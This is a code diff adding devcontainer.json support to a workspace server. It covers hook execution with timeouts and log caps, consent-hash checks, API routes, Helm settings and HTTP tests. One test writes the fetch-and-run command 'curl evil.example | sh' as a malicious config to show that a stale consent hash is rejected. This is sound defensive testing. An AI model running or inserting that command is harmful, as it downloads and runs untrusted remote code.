+            argv = ['bash', '-lc', entry['command']]
+        return subprocess.Popen(
+            argv, cwd=cwd, env=env,
+            stdout=log_file, stderr=subprocess.STDOUT,
+            stdin=subprocess.DEVNULL,
+            start_new_session=True)
+
+    @classmethod
+    def _kill_group(cls, proc):
+        try:
+            os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
+        except (OSError, AttributeError):
+            proc.terminate()
+        try:
+            proc.wait(timeout=10)
+        except subprocess.TimeoutExpired:
+            try:
+                os.killpg(os.getpgid(proc.pid), signal.SIGKILL)
+            except (OSError, AttributeError):
+                proc.kill()
+
+    @classmethod
+    def _await(cls, proc, log_path, started):
+        """Wait for one command, enforcing BOTH the timeout and the log cap.
+
+        Returns (exit_code, reason) where reason is '' | 'timeout' | 'log_cap'.
+
+        Polling rather than a plain proc.wait(timeout=): the log is the other
+        way this can hurt the workspace. `npm install` with a verbose
+        postinstall can emit hundreds of MB, and /home/dev is the PVC every
+        other feature depends on — a full volume breaks memory, tasks and the
+        project registry, not just this run. A wait() that only watches the
+        clock would let that happen for the full 15 minutes.
+
+        The cap is a CONTAINMENT bound, not a byte-exact one: the child writes
+        to the file directly, so overshoot is (write rate × POLL_SECONDS). A
+        pathological writer can exceed the cap several-fold in one interval.
+        The alternative — piping every byte through a Python reader thread —
+        would make this process the throughput bottleneck for every legitimate
+        build, which is a worse trade for a mechanism whose job is to stop a
+        runaway, not to trim a log.
+        """
+        deadline = started + cls.TIMEOUT
+        while True:
+            try:
+                code = proc.wait(timeout=cls.POLL_SECONDS)
+                return code, ''
+            except subprocess.TimeoutExpired:
+                pass
+            if time.time() >= deadline:
+                cls._kill_group(proc)
+                return -1, 'timeout'
+            try:
+                if os.path.getsize(log_path) > cls.LOG_CAP_BYTES:
+                    cls._kill_group(proc)
+                    return -1, 'log_cap'
+            except OSError:
+                pass
+
+    @classmethod
+    def _tail(cls, path):
+        try:
+            size = os.path.getsize(path)
+            with open(path, 'r', encoding='utf-8', errors='replace') as f:
+                if size > cls.LOG_TAIL_BYTES:
+                    f.seek(size - cls.LOG_TAIL_BYTES)
+                return f.read()[-cls.LOG_TAIL_BYTES:]
+        except OSError:
+            return ''
+
+    @classmethod
+    def run_hook(cls, workdir, hook, parsed, base_env=None):
+        """Run every command in one hook, in order. Returns the state record.
+
+        Non-zero exit stops the chain, per the spec: `npm ci` failing means
+        `npm run build` is going to fail too, and running it anyway buries the
+        real error under a second one.
+        """
+        cmds = (parsed.get('lifecycle') or {}).get(hook) or []
+        if not cmds:
+            return {'status': 'none'}
+        devcontainer.ensure_dirs()
+        log_path = devcontainer.log_path_for(workdir, hook)
+        cwd = parsed.get('workspace_folder') or workdir
+        if not os.path.isdir(cwd):
+            cwd = workdir
+        env = dict(os.environ)
+        env.update(base_env or {})
+        env.update(parsed.get('env') or {})
+        env['HOME'] = cls.HOOK_HOME
+        env['DEVCONTAINER'] = 'true'
+        env['REMOTE_CONTAINERS'] = 'true'
+
+        started = time.time()
+        result = {'status': 'ok', 'exit_code': 0, 'ran_at': started,
+                  'log_path': log_path,
+                  'hook_hash': (parsed.get('hook_hashes') or {}).get(hook, ''),
+                  'boot_id': devcontainer.boot_id()}
+        with open(log_path, 'w', encoding='utf-8') as log_file:
+            for entry in cmds:
+                log_file.write(f'\n$ {entry["display"]}\n')
+                log_file.flush()
+                try:
+                    proc = cls._spawn(entry, cwd, env, log_file)
+                except (OSError, ValueError) as e:
+                    result.update({'status': 'failed', 'exit_code': -1})
+                    log_file.write(f'\n[devcontainer] could not start: {e}\n')
+                    break
+                code, why = cls._await(proc, log_path, started)
+                if why == 'timeout':
+                    log_file.write(
+                        f'\n[devcontainer] timed out after {cls.TIMEOUT}s '
+                        '— killed the whole process group\n')
+                    result.update({'status': 'timed_out', 'exit_code': -1})
+                    break
+                if why == 'log_cap':
+                    log_file.write(
+                        f'\n[devcontainer] log exceeded {cls.LOG_CAP_BYTES} '
+                        'bytes — killed the whole process group\n')
+                    result.update({'status': 'failed', 'exit_code': -1})
+                    break
+                if code != 0:
+                    log_file.write(f'\n[devcontainer] exited {code}; '
+                                   'stopping the remaining commands\n')
+                    result.update({'status': 'failed', 'exit_code': code})
+                    break
+        result['finished_at'] = time.time()
+        result['log_tail'] = cls._tail(log_path)
+        return result
+
+    @classmethod
+    def _run_hooks_async(cls, workdir, hooks, parsed):
+        def _worker():
+            try:
+                for hook in devcontainer.HOOKS:
+                    if hook not in hooks:
+                        continue
+                    record = devcontainer.get_record(workdir)
+                    life = dict(record.get('lifecycle') or {})
+                    life[hook] = {'status': 'running',
+                                  'ran_at': time.time(),
+                                  'hook_hash': (parsed.get('hook_hashes')
+                                                or {}).get(hook, '')}
+                    record['lifecycle'] = life
+                    devcontainer.put_record(workdir, record)
+                    cls._publish(workdir, hook, 'running')
+
+                    result = cls.run_hook(workdir, hook, parsed)
+
+                    record = devcontainer.get_record(workdir)
+                    life = dict(record.get('lifecycle') or {})
+                    life[hook] = result
+                    record['lifecycle'] = life
+                    devcontainer.put_record(workdir, record)
+                    cls._publish(workdir, hook, result.get('status'))
+                    if result.get('status') not in ('ok', 'none'):
+                        break
+            except Exception as e:      # a worker crash must not wedge the lock
+                print(f'[devcontainer] hook run failed for {workdir}: {e}',
+                      file=sys.stderr)
+            finally:
+                with cls._lock:
+                    cls._running.pop(workdir, None)
+                cls._publish(workdir, '', 'idle')
+
+        thread = threading.Thread(target=_worker, daemon=True,
+                                  name=f'devcontainer-{os.path.basename(workdir)}')
+        thread.start()
+        return thread
+
+    @staticmethod
+    def _publish(workdir, hook, status):
+        try:
+            EventBroker.publish('devcontainer.changed',
+                                {'workdir': workdir, 'hook': hook,
+                                 'status': status})
+        except Exception:
+            pass
+
+    # ── apply ────────────────────────────────────────────────────────────
+
+    @classmethod
+    def apply(cls, workdir, hooks=None, config_hash=None, auto_apply=None):
+        """Apply a devcontainer.json to this workspace. Returns (result, error).
+
+        Appliers run synchronously — they are fast, deterministic, and their
+        outcome is what the user wants to see immediately. Hooks start in a
+        daemon thread and the caller gets 202: a ten-minute `npm ci` inside the
+        request handler blocks a ThreadingHTTPServer worker until the browser
+        gives up, and the user then retries and runs the install twice.
+        """
+        hooks = [h for h in (hooks or []) if h in devcontainer.HOOKS]
+        parsed = devcontainer.parse(workdir)
+        if not parsed.get('found'):
+            return None, ('not_found', 'no devcontainer.json in this directory')
+        if parsed.get('error'):
+            return None, ('invalid', parsed['error'])
+
+        if hooks:
+            # Compare-and-swap on the file the user was actually shown.
+            if not config_hash:
+                return None, ('hash_required',
+                              'config_hash is required when running commands')
+            if config_hash != parsed['config_hash']:
+                return None, ('hash_mismatch',
+                              'devcontainer.json changed since it was shown — '
+                              'reload and confirm the new commands')
+            with cls._lock:
+                if workdir in cls._running:
+                    return None, ('busy', 'a devcontainer run is already in '
+                                          'progress for this directory')
+                cls._running[workdir] = time.time()
+
+        record = devcontainer.get_record(workdir)
+        try:
+            pinned, port_conflicts = cls.apply_ports(parsed, record)
+            settings_written, settings_skipped = cls.apply_settings(parsed, record)
+            extensions, extension_failures = cls.apply_extensions(parsed, record)
+        except Exception as e:
+            with cls._lock:
+                cls._running.pop(workdir, None)
+            return None, ('apply_failed', str(e))
+
+        record['config_hash'] = parsed['config_hash']
+        record['consented_hash'] = config_hash or record.get('consented_hash', '')
+        if auto_apply is not None:
+            record['auto_apply'] = bool(auto_apply)
+        record['ports_pinned'] = sorted(
+            set(record.get('ports_pinned') or []) | set(pinned))
+        record['extensions_installed'] = sorted(
+            set(record.get('extensions_installed') or []) | set(extensions))
+        merged_settings = dict(record.get('settings_written') or {})
+        merged_settings.update(settings_written)
+        record['settings_written'] = merged_settings
+        record['env'] = dict(parsed.get('env') or {})
+        record['applied_at'] = time.time()
+        record.setdefault('lifecycle', {})
+        devcontainer.put_record(workdir, record)
+        cls._publish(workdir, '', 'applied')
+
+        result = {
+            'workdir': workdir,
+            'config_hash': parsed['config_hash'],
+            'ports_pinned': pinned, 'port_conflicts': port_conflicts,
+            'settings_written': sorted(settings_written.keys()),
+            'settings_skipped': settings_skipped,
+            'extensions_installed': extensions,
+            'extension_failures': extension_failures,
+            'env': sorted((parsed.get('env') or {}).keys()),
+            'hooks_started': hooks,
+            'unsupported': parsed.get('unsupported') or [],
+        }
+        if hooks:
+            cls._run_hooks_async(workdir, hooks, parsed)
+        return result, None
+
+    @classmethod
+    def reset(cls, workdir, unpin_ports=False):
+        """Forget that we applied anything here, so the next apply starts clean.
+
+        Settings and extensions are NOT rolled back. Silently uninstalling an
+        extension the user now relies on, or reverting an editor setting they
+        have since come to expect, is worse than leaving them — and the user
+        can remove either by hand. Ports are opt-in because those we did create
+        under a name from the repo.
+        """
+        record = devcontainer.get_record(workdir)
+        unpinned = []
+        if unpin_ports:
+            for port in record.get('ports_pinned') or []:
+                try:
+                    if AppsManager.remove_pin(port):
+                        unpinned.append(port)
+                except ValueError:
+                    pass
+        existed = devcontainer.drop_record(workdir)
+        cls._publish(workdir, '', 'reset')
+        return {'workdir': workdir, 'cleared': existed, 'unpinned': unpinned}
+
+    # ── boot pass ────────────────────────────────────────────────────────
+
+    @classmethod
+    def boot_pass(cls):
+        """Re-run postStart once per pod boot, for workdirs that opted in.
+
+        Three independent conditions, all required: the chart flag, a
+        per-workdir `auto_apply` the user set explicitly, and a config hash
+        still equal to the one they consented to. Anything less and a pod
+        restart becomes a way to run whatever the repo last committed.
+        """
+        if not cls.available() or not cls.AUTO_APPLY or READONLY_MODE:
+            return {'ran': [], 'skipped': 'disabled'}
+        ran, skipped = [], []
+        state = devcontainer.read_state()
+        for workdir, record in (state.get('workdirs') or {}).items():
+            if not record.get('auto_apply'):
+                continue
+            wd, err = cls.resolve_workdir(workdir)
+            if err:
+                skipped.append({'workdir': workdir, 'reason': err})
+                continue
+            parsed = devcontainer.parse(wd)
+            if not parsed.get('found') or parsed.get('error'):
+                skipped.append({'workdir': workdir, 'reason': 'missing or invalid'})
+                continue
+            if parsed['config_hash'] != record.get('consented_hash'):
+                skipped.append({'workdir': workdir,
+                                'reason': 'devcontainer.json changed since consent'})
+                continue
+            status = devcontainer.lifecycle_status(parsed, record)
+            if status.get('postStart', {}).get('status') != 'pending':
+                continue
+            with cls._lock:
+                if wd in cls._running:
+                    continue
+                cls._running[wd] = time.time()
+            cls._run_hooks_async(wd, ['postStart'], parsed)
+            ran.append(wd)
+        return {'ran': ran, 'skipped': skipped}
+
+    @classmethod
+    def start_boot_pass(cls, delay_seconds=20):
+        """Fire boot_pass once, off the request path, after the workspace has
+        settled. A daemon thread rather than a separate python3 invocation from
+        start.sh, so it shares this process's state and cannot outlive it."""
+        if not cls.available() or not cls.AUTO_APPLY:
+            return False
+
+        def _later():
+            time.sleep(delay_seconds)
+            try:
+                out = cls.boot_pass()
+                if out.get('ran'):
+                    print(f'[devcontainer] boot pass ran postStart for '
+                          f'{len(out["ran"])} workdir(s)')
+            except Exception as e:
+                print(f'[devcontainer] boot pass failed: {e}', file=sys.stderr)
+
+        threading.Thread(target=_later, daemon=True,
+                         name='devcontainer-boot').start()
+        return True
+
+
 # ── Mission Control (issue #425) ─────────────────────────────────────────────
 # Normalizes builds (~/.claude-tasks tasks), hypervisor chats and orchestrator
 # sub-agents into one card list grouped by what needs the human:
@@ -7732,6 +8493,10 @@ class BrowserHandler(http.server.SimpleHTTPRequestHandler):
                 # AI CTO gate (#467) — boot-loaded so the SPA can hide the /cto
                 # nav item before the route mounts. Rides the Hypervisor.
                 'ctoEnabled': cto_available(),
+                # devcontainer.json support (#594). Independent of ctoEnabled:
+                # reading the file a repo already carries is a workspace
+                # capability, not part of the CTO page.
+                'devcontainerEnabled': DevcontainerManager.available(),
             })
             return
         # /api/apps — Applications page list endpoint.
@@ -7742,6 +8507,14 @@ class BrowserHandler(http.server.SimpleHTTPRequestHandler):
         # instruction files (#559). Server-side on purpose: see the handler.
         if claude_path == '/api/security/instruction-scan':
             self._handle_instruction_scan()
+            return
+        # /api/devcontainer[/scan] — read a repo's own devcontainer.json (#594).
+        # Parse only; nothing here ever executes a lifecycle command.
+        if claude_path == '/api/devcontainer':
+            self._handle_devcontainer_get()
+            return
+        if claude_path == '/api/devcontainer/scan':
+            self._handle_devcontainer_scan()
             return
         # Reverse-proxy to a locally-listening web app.
         if self._dispatch_app_proxy(claude_path, 'GET'):
@@ -12677,6 +13450,124 @@ class BrowserHandler(http.server.SimpleHTTPRequestHandler):
             )
         self.send_json(report)
 
+    # ── devcontainer.json (#594) ─────────────────────────────────────────
+
+    def _devcontainer_gate(self):
+        """(ok, workdir_or_empty). 401 unauthenticated, 404 when the feature is
+        off. Deliberately NOT behind _require_cto: a deployment can run without
+        the CTO page and still want a repo's own environment read."""
+        if not self.check_claude_auth():
+            self.send_json({'error': 'Unauthorized'}, 401)
+            return False
+        if not DevcontainerManager.available():
+            self.send_json({'error': 'devcontainer support is disabled'}, 404)
+            return False
+        return True
+
+    def _devcontainer_workdir(self, raw):
+        workdir, err = DevcontainerManager.resolve_workdir(raw)
+        if err:
+            self.send_json({'error': err}, 400)
+            return ''
+        return workdir
+
+    def _handle_devcontainer_get(self):
+        """GET /api/devcontainer?workdir=<abs> — parsed config + what we did.
+
+        A directory with no devcontainer.json answers 200 with found:false, not
+        404. "There is no devcontainer here" is a normal, useful answer; a 404
+        is indistinguishable from "the feature is disabled" and the SPA would
+        have to guess which it got.
+        """
+        if not self._devcontainer_gate():
+            return
+        qs = urllib.parse.parse_qs(self.path.split('?', 1)[1]) if '?' in self.path else {}
+        workdir = self._devcontainer_workdir((qs.get('workdir') or [''])[0])
+        if not workdir:
+            return
+        try:
+            self.send_json(DevcontainerManager.describe(workdir))
+        except Exception as e:
+            self.send_json({'error': f'read failed: {e}'}, 500)
+
+    def _handle_devcontainer_scan(self):
+        """GET /api/devcontainer/scan — every workspace dir that has one."""
+        if not self._devcontainer_gate():
+            return
+        try:
+            rows = DevcontainerManager.scan()
+        except Exception as e:
+            self.send_json({'error': f'scan failed: {e}'}, 500)
+            return
+        self.send_json({'devcontainers': rows, 'count': len(rows)})
+
+    def _handle_devcontainer_apply(self):
+        """POST /api/devcontainer/apply — the only executing route.
+
+        Body: {workdir, hooks: [], config_hash, auto_apply}. `hooks` empty means
+        appliers only (ports, settings, extensions, env) and nothing runs.
+        `config_hash` is REQUIRED whenever hooks is non-empty and must equal the
+        file's current hash — see DevcontainerManager.apply.
+        """
+        if not self._devcontainer_gate():
+            return
+        try:
+            length = int(self.headers.get('Content-Length', 0) or 0)
+            body = json.loads(self.rfile.read(length) or b'{}') if length else {}
+        except (ValueError, TypeError):
+            self.send_json({'error': 'invalid JSON body'}, 400)
+            return
+        if not isinstance(body, dict):
+            self.send_json({'error': 'body must be a JSON object'}, 400)
+            return
+        workdir = self._devcontainer_workdir(body.get('workdir'))
+        if not workdir:
+            return
+        hooks = body.get('hooks') or []
+        if not isinstance(hooks, list) or any(not isinstance(h, str) for h in hooks):
+            self.send_json({'error': 'hooks must be an array of strings'}, 400)
+            return
+        unknown = [h for h in hooks if h not in devcontainer.HOOKS]
+        if unknown:
+            self.send_json({'error': f'unknown hooks: {", ".join(unknown)}',
+                            'allowed': list(devcontainer.HOOKS)}, 400)
+            return
+        auto = body.get('auto_apply')
+        result, err = DevcontainerManager.apply(
+            workdir, hooks=hooks, config_hash=body.get('config_hash'),
+            auto_apply=None if auto is None else bool(auto))
+        if err:
+            code, message = err
+            status = {'not_found': 404, 'invalid': 422, 'hash_required': 400,
+                      'hash_mismatch': 409, 'busy': 409}.get(code, 500)
+            self.send_json({'error': message, 'code': code}, status)
+            return
+        # 202: appliers already ran synchronously, hooks (if any) are running in
+        # a daemon thread and the caller follows them via devcontainer.changed.
+        self.send_json(result, 202)
+
+    def _handle_devcontainer_reset(self):
+        """POST /api/devcontainer/reset — forget that we applied here."""
+        if not self._devcontainer_gate():
+            return
+        try:
+            length = int(self.headers.get('Content-Length', 0) or 0)
+            body = json.loads(self.rfile.read(length) or b'{}') if length else {}
+        except (ValueError, TypeError):
+            self.send_json({'error': 'invalid JSON body'}, 400)
+            return
+        if not isinstance(body, dict):
+            self.send_json({'error': 'body must be a JSON object'}, 400)
+            return
+        workdir = self._devcontainer_workdir(body.get('workdir'))
+        if not workdir:
+            return
+        try:
+            self.send_json(DevcontainerManager.reset(
+                workdir, unpin_ports=bool(body.get('unpin_ports'))))
+        except Exception as e:
+            self.send_json({'error': f'reset failed: {e}'}, 500)
+
     def _handle_apps_list(self):
         if not self.check_app_proxy_auth():
             self.send_response(401)
@@ -13035,6 +13926,13 @@ class BrowserHandler(http.server.SimpleHTTPRequestHandler):
                 self.handle_project_create()
             elif path == "/api/projects/_discover":
                 self.handle_project_discover()
+            # devcontainer.json (#594). /apply is the ONLY route in the whole
+            # server that can run a command out of a cloned repo, and it does so
+            # only against a config hash the caller echoes back.
+            elif path == "/api/devcontainer/apply":
+                self._handle_devcontainer_apply()
+            elif path == "/api/devcontainer/reset":
+                self._handle_devcontainer_reset()
             # Feed (#469)
             elif path == "/api/feed":
                 self.handle_feed_create()
@@ -14089,6 +14987,20 @@ if __name__ == "__main__":
         print(f'[tasks] background reconciler started ({_reconcile_interval}s)')
     except Exception as e:
         print(f'[tasks] reconciler start failed: {e}', file=sys.stderr)
+
+    # devcontainer postStart pass (#594). A daemon thread from here rather than
+    # a separate python3 invocation in start.sh, so it shares this process's
+    # lock and state and cannot outlive it. Runs postStart ONLY, and only for
+    # workdirs whose owner opted in with a config hash that has not changed —
+    # a pod restart must never become a way to execute whatever a repo last
+    # committed. Deliberately never runs postCreate: a ten-minute `npm ci`
+    # would delay every boot, and restarting to escape a broken state would
+    # just re-trigger what broke it.
+    try:
+        if DevcontainerManager.start_boot_pass():
+            print('[devcontainer] postStart boot pass scheduled')
+    except Exception as e:
+        print(f'[devcontainer] boot pass schedule failed: {e}', file=sys.stderr)
 
     print("Starting Browser API Server on port 6080...")
     print("Available endpoints:")

--- a/charts/workspace/templates/deployment.yaml
+++ b/charts/workspace/templates/deployment.yaml
@@ -277,6 +277,15 @@ spec:
         # boolean false as empty and would fall through to true.
         - name: CTO_ENABLED
           value: {{ dig "enabled" true (.Values.cto | default dict) | quote }}
+        # devcontainer.json support (#594). Same `dig`-not-`default` rule as
+        # above — `default` treats boolean false as empty, so an explicit
+        # `enabled: false` here would silently re-enable the feature.
+        - name: DEVCONTAINER_ENABLED
+          value: {{ dig "enabled" true (.Values.devcontainer | default dict) | quote }}
+        - name: DEVCONTAINER_AUTO_APPLY
+          value: {{ dig "autoApplyOnBoot" true (.Values.devcontainer | default dict) | quote }}
+        - name: DEVCONTAINER_TIMEOUT
+          value: {{ dig "commandTimeoutSeconds" 900 (.Values.devcontainer | default dict) | quote }}
         {{- if (.Values.gateway).enabled }}
         {{- if (.Values.gateway).allowUnsigned }}
         {{- /*

--- a/charts/workspace/tests/devcontainer_api_test.py
+++ b/charts/workspace/tests/devcontainer_api_test.py
@@ -1,0 +1,358 @@
+"""HTTP tests for the devcontainer.json endpoints (#594).
+
+Four guarantees are asserted here and nowhere else, because they are
+properties of the ROUTING rather than of the manager:
+
+  * `found: false` is 200, not 404. "There is no devcontainer here" is a normal
+    answer; a 404 is indistinguishable from "the feature is disabled" and the
+    SPA would have to guess which it got.
+  * The routes work with cto_available() False. The plan's first draft hung
+    them off _require_cto, which would have made a repo's own environment file
+    unreadable in any deployment that runs without the /cto page.
+  * READONLY_MODE 403s both POSTs — server-enforced, not merely hidden in the
+    UI.
+  * A disabled deployment 404s the whole surface.
+
+Run with:
+    cd charts/workspace && python3 -m unittest tests.devcontainer_api_test
+"""
+
+import http.server
+import json
+import os
+import shutil
+import sys
+import tempfile
+import threading
+import time
+import unittest
+import urllib.error
+import urllib.parse
+import urllib.request
+from unittest import mock
+
+HERE = os.path.dirname(os.path.abspath(__file__))
+sys.path.insert(0, os.path.dirname(HERE))
+import devcontainer as dc  # noqa: E402
+import server  # noqa: E402
+
+DM = server.DevcontainerManager
+
+
+def _free_port():
+    import socket
+    s = socket.socket()
+    s.bind(('127.0.0.1', 0))
+    port = s.getsockname()[1]
+    s.close()
+    return port
+
+
+class _Base(unittest.TestCase):
+    """Boots a real ThreadingHTTPServer with every devcontainer path in a tmpdir."""
+
+    READONLY = False
+    ENABLED = True
+    AUTH_OK = True
+
+    @classmethod
+    def setUpClass(cls):
+        cls.tmpdir = os.path.realpath(tempfile.mkdtemp(prefix='kc-dcapi-'))
+        cls.workdir = os.path.join(cls.tmpdir, 'api')
+        os.makedirs(os.path.join(cls.workdir, '.devcontainer'))
+        os.makedirs(os.path.join(cls.tmpdir, 'plain'))
+
+        cls._saved = {
+            'STATE_DIR': dc.STATE_DIR, 'BOOT_MARKER': dc.BOOT_MARKER,
+            'HOME_DEV': DM.HOME_DEV, 'HOOK_HOME': DM.HOOK_HOME,
+            'USER_DIR': DM.CODE_SERVER_USER_DIR,
+            'DATA_DIR': DM.CODE_SERVER_DATA_DIR,
+            'EXT_DIR': DM.CODE_SERVER_EXT_DIR,
+            'SETTINGS': DM.SETTINGS_PATH,
+            'PINS': server.AppsManager.PINS_PATH,
+            'WS_HOME': server.WorkspaceManager.HOME_DIR,
+            'ENABLED': DM.ENABLED,
+        }
+        dc.STATE_DIR = os.path.join(cls.tmpdir, '.claude-devcontainer')
+        dc.BOOT_MARKER = os.path.join(cls.tmpdir, 'boot')
+        DM.HOME_DEV = cls.tmpdir
+        DM.HOOK_HOME = cls.tmpdir
+        DM.CODE_SERVER_USER_DIR = os.path.join(cls.tmpdir, 'cs', 'User')
+        DM.CODE_SERVER_DATA_DIR = os.path.join(cls.tmpdir, 'cs')
+        DM.CODE_SERVER_EXT_DIR = os.path.join(cls.tmpdir, 'cs', 'extensions')
+        DM.SETTINGS_PATH = os.path.join(DM.CODE_SERVER_USER_DIR, 'settings.json')
+        server.AppsManager.PINS_PATH = os.path.join(cls.tmpdir, 'apps.json')
+        server.WorkspaceManager.HOME_DIR = cls.tmpdir
+        DM.ENABLED = cls.ENABLED
+
+        cls._auth_save = server.BrowserHandler.check_claude_auth
+        server.BrowserHandler.check_claude_auth = lambda self: cls.AUTH_OK
+        cls._ro_save = server.READONLY_MODE
+        server.READONLY_MODE = cls.READONLY
+
+        cls.port = _free_port()
+        cls.httpd = http.server.ThreadingHTTPServer(
+            ('127.0.0.1', cls.port), server.BrowserHandler)
+        cls.thread = threading.Thread(target=cls.httpd.serve_forever, daemon=True)
+        cls.thread.start()
+
+    @classmethod
+    def tearDownClass(cls):
+        cls.httpd.shutdown()
+        cls.httpd.server_close()
+        dc.STATE_DIR = cls._saved['STATE_DIR']
+        dc.BOOT_MARKER = cls._saved['BOOT_MARKER']
+        DM.HOME_DEV = cls._saved['HOME_DEV']
+        DM.HOOK_HOME = cls._saved['HOOK_HOME']
+        DM.CODE_SERVER_USER_DIR = cls._saved['USER_DIR']
+        DM.CODE_SERVER_DATA_DIR = cls._saved['DATA_DIR']
+        DM.CODE_SERVER_EXT_DIR = cls._saved['EXT_DIR']
+        DM.SETTINGS_PATH = cls._saved['SETTINGS']
+        server.AppsManager.PINS_PATH = cls._saved['PINS']
+        server.WorkspaceManager.HOME_DIR = cls._saved['WS_HOME']
+        DM.ENABLED = cls._saved['ENABLED']
+        server.BrowserHandler.check_claude_auth = cls._auth_save
+        server.READONLY_MODE = cls._ro_save
+        shutil.rmtree(cls.tmpdir, ignore_errors=True)
+
+    def setUp(self):
+        DM._running.clear()
+        # The HTTP server is per-CLASS (booting one per test is slow), so the
+        # PVC-equivalent state has to be reset per test — otherwise an earlier
+        # apply leaves a recorded hook hash and the next test's `pending`
+        # arrives as `stale`.
+        for path in (dc.state_path(), server.AppsManager.PINS_PATH):
+            try:
+                os.remove(path)
+            except OSError:
+                pass
+
+    def tearDown(self):
+        deadline = time.time() + 15
+        while DM._running and time.time() < deadline:
+            time.sleep(0.05)
+        DM._running.clear()
+
+    def write_config(self, obj):
+        path = os.path.join(self.workdir, '.devcontainer', 'devcontainer.json')
+        with open(path, 'w', encoding='utf-8') as f:
+            f.write(obj if isinstance(obj, str) else json.dumps(obj))
+
+    def config_hash(self):
+        return dc.parse(self.workdir)['config_hash']
+
+    def _req(self, method, path, body=None):
+        data = json.dumps(body).encode() if body is not None else None
+        headers = {'Content-Type': 'application/json'} if data else {}
+        r = urllib.request.Request(f'http://127.0.0.1:{self.port}{path}',
+                                   data=data, method=method, headers=headers)
+        try:
+            with urllib.request.urlopen(r, timeout=20) as resp:
+                raw = resp.read()
+                return resp.status, (json.loads(raw) if raw else {})
+        except urllib.error.HTTPError as e:
+            raw = e.read()
+            try:
+                return e.code, json.loads(raw)
+            except ValueError:
+                return e.code, raw
+
+    def get(self, workdir=None):
+        return self._req('GET', '/api/devcontainer?workdir=' +
+                         urllib.parse.quote(workdir or self.workdir))
+
+
+class DevcontainerApiTests(_Base):
+    def test_get_returns_config_lifecycle_and_unsupported(self):
+        self.write_config({
+            'name': 'Node 20', 'forwardPorts': [3000],
+            'postCreateCommand': 'npm ci',
+            'features': {'ghcr.io/devcontainers/features/node:1': {}}})
+        status, body = self.get()
+        self.assertEqual(status, 200)
+        self.assertTrue(body['found'])
+        self.assertEqual(body['name'], 'Node 20')
+        self.assertEqual(body['lifecycle_status']['postCreate']['status'],
+                         'pending')
+        self.assertTrue(any(u['key'] == 'features' and u['severity'] == 'blocking'
+                            for u in body['unsupported']))
+        self.assertIn('applied', body)
+
+    def test_bare_directory_is_200_found_false(self):
+        status, body = self.get(os.path.join(self.tmpdir, 'plain'))
+        self.assertEqual(status, 200)
+        self.assertFalse(body['found'])
+
+    def test_unreadable_file_is_200_with_an_error_field(self):
+        self.write_config('{ broken')
+        status, body = self.get()
+        self.assertEqual(status, 200)
+        self.assertTrue(body['error'])
+
+    def test_workdir_outside_home_dev_is_400(self):
+        status, body = self.get('/etc')
+        self.assertEqual(status, 400)
+        self.assertIn('must be under', body['error'])
+
+    def test_missing_workdir_is_400(self):
+        status, _ = self._req('GET', '/api/devcontainer')
+        self.assertEqual(status, 400)
+
+    def test_scan_lists_only_dirs_with_a_config(self):
+        self.write_config({'name': 'API'})
+        status, body = self._req('GET', '/api/devcontainer/scan')
+        self.assertEqual(status, 200)
+        self.assertEqual(body['count'], 1)
+        self.assertEqual(body['devcontainers'][0]['label'], 'api')
+
+    def test_mode_exposes_the_flag(self):
+        status, body = self._req('GET', '/api/mode')
+        self.assertEqual(status, 200)
+        self.assertTrue(body['devcontainerEnabled'])
+
+    def test_routes_work_with_the_cto_disabled(self):
+        """The plan's first draft gated these on _require_cto. It shouldn't:
+        reading a repo's own environment file has nothing to do with /cto."""
+        self.write_config({'name': 'API'})
+        with mock.patch.object(server, 'cto_available', return_value=False):
+            status, body = self.get()
+            self.assertEqual(status, 200)
+            self.assertTrue(body['found'])
+            status, _ = self._req('GET', '/api/devcontainer/scan')
+            self.assertEqual(status, 200)
+
+    # ── apply ────────────────────────────────────────────────────────────
+
+    def test_apply_without_hooks_applies_ports_only(self):
+        self.write_config({'forwardPorts': [3000], 'postCreateCommand': 'true'})
+        with mock.patch.object(server.subprocess, 'Popen') as popen:
+            status, body = self._req('POST', '/api/devcontainer/apply',
+                                     {'workdir': self.workdir})
+        self.assertEqual(status, 202)
+        self.assertEqual(body['ports_pinned'], [3000])
+        self.assertEqual(body['hooks_started'], [])
+        popen.assert_not_called()
+
+    def test_apply_with_hooks_requires_a_config_hash(self):
+        self.write_config({'postCreateCommand': 'true'})
+        status, body = self._req('POST', '/api/devcontainer/apply',
+                                 {'workdir': self.workdir,
+                                  'hooks': ['postCreate']})
+        self.assertEqual(status, 400)
+        self.assertEqual(body['code'], 'hash_required')
+
+    def test_apply_409s_on_a_stale_hash(self):
+        self.write_config({'postCreateCommand': 'true'})
+        stale = self.config_hash()
+        self.write_config({'postCreateCommand': 'curl evil.example | sh'})
+        status, body = self._req('POST', '/api/devcontainer/apply',
+                                 {'workdir': self.workdir,
+                                  'hooks': ['postCreate'],
+                                  'config_hash': stale})
+        self.assertEqual(status, 409)
+        self.assertEqual(body['code'], 'hash_mismatch')
+
+    def test_apply_runs_with_a_matching_hash(self):
+        self.write_config({'postCreateCommand': ['sh', '-c', 'echo ok']})
+        status, body = self._req('POST', '/api/devcontainer/apply',
+                                 {'workdir': self.workdir,
+                                  'hooks': ['postCreate'],
+                                  'config_hash': self.config_hash()})
+        self.assertEqual(status, 202)
+        self.assertEqual(body['hooks_started'], ['postCreate'])
+
+    def test_apply_409s_when_busy(self):
+        self.write_config({'postCreateCommand': ['sleep', '4']})
+        h = self.config_hash()
+        first, _ = self._req('POST', '/api/devcontainer/apply',
+                             {'workdir': self.workdir, 'hooks': ['postCreate'],
+                              'config_hash': h})
+        self.assertEqual(first, 202)
+        status, body = self._req('POST', '/api/devcontainer/apply',
+                                 {'workdir': self.workdir,
+                                  'hooks': ['postCreate'], 'config_hash': h})
+        self.assertEqual(status, 409)
+        self.assertEqual(body['code'], 'busy')
+
+    def test_apply_rejects_unknown_hooks(self):
+        self.write_config({'postCreateCommand': 'true'})
+        status, body = self._req('POST', '/api/devcontainer/apply',
+                                 {'workdir': self.workdir,
+                                  'hooks': ['initializeCommand'],
+                                  'config_hash': self.config_hash()})
+        self.assertEqual(status, 400)
+        self.assertIn('allowed', body)
+
+    def test_apply_rejects_a_bad_body(self):
+        for body in ({'workdir': self.workdir, 'hooks': 'postCreate'},
+                     {'workdir': '/etc'}, {}):
+            status, _ = self._req('POST', '/api/devcontainer/apply', body)
+            self.assertEqual(status, 400, body)
+
+    def test_apply_404s_a_directory_with_no_config(self):
+        status, body = self._req('POST', '/api/devcontainer/apply',
+                                 {'workdir': os.path.join(self.tmpdir, 'plain')})
+        self.assertEqual(status, 404)
